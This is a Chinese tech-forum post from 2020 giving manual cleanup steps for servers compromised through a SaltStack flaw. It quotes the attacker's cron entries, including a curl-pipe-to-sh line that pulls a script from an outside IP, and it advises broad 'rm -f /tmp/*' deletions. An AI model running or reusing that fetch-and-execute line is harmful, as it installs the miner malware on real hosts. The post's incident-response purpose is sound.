起步软件技术论坛
搜索
 找回密码
 注册

QQ登录

只需一步,快速开始

查看: 2888|回复: 2

[分享] 正式部署应用,salt漏洞导致访问异常处理办法

[复制链接]

10

主题

2831

帖子

3783

积分

版主

Rank: 7Rank: 7Rank: 7

积分
3783
QQ
发表于 2020-5-13 14:51:40 | 显示全部楼层 |阅读模式
本帖最后由 gaofan 于 2020-5-18 19:46 编辑

手工清理病毒
1. ssh到自己的主机,top指令查看,如果有salt-minions之类的进程占满cpu,说明中招了,先卸载一下salt-minion
centos/redhat:    yum remove salt-minion
ubuntu: apt remove salt-minion
2. 查看定时任务
crontab -l
如果看到类似这样
* * * * * curl http://217.8.117.137/c.sh | sh > /dev/null 2>&1
* * * * * /usr/bin/salt-store || /tmp/salt-store || /var/tmp/salt-store
用 crontab -e 指令编辑定时任务
进入编辑器后,把上面两行删除然后保存退出,删除(按两下d删除光标行)和退出(按冒号,光标在最下面,输入wq回车)可参考vim的基本用法
3. 把上面的文件删除
rm -f /usr/bin/salt-store
rm -f /tmp/salt-store
rm -f /var/tmp/salt-store
rm -f /tmp/*
rm -f /var/tmp/*
4. 杀干坏事的进程
ps aux |grep salt-store
如果有值,则用
kill xxx
杀掉,xxx就是进程id(第二列的那个数字)
同样的道理,用
ps aux |grep salt-minions
查看,并用kill杀
5. top 观察一下,是否还有salt-minions,如果没有就正常了
需要发应用及正式服务器请在服务群里联系QQ:516367879。
您需要登录后才可以回帖 登录 | 注册

本版积分规则

小黑屋|手机版|X3技术论坛|Justep Inc.    

GMT+8, 2024-4-20 12:24 , Processed in 0.088510 second(s), 23 queries .

Powered by Discuz! X3.4

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表